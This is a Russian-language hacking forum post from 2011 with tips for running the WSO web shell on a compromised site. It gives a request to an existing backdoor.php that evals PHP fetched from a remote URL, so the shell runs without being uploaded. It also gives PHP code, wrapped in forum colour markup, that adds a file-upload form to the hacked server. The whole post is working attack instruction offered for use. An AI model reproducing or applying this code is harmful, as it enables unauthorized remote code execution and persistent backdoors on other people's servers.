14.12.2011, 06:43
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Доп:
1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:
http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));
2. Загрузка прямо из компьютера, евалим это:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"
Shell:
"[/COLOR][COLOR="#007700"];
if(!empty([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]))
{
@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) ?
print[/COLOR][COLOR="#DD0000"]'File '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].
[/COLOR][COLOR="#DD0000"]' uploaded!
'[/COLOR][COLOR="#007700"]: print[/COLOR][COLOR="#DD0000"]'Try...
'";
}[/COLOR][/COLOR]
.
|
|
|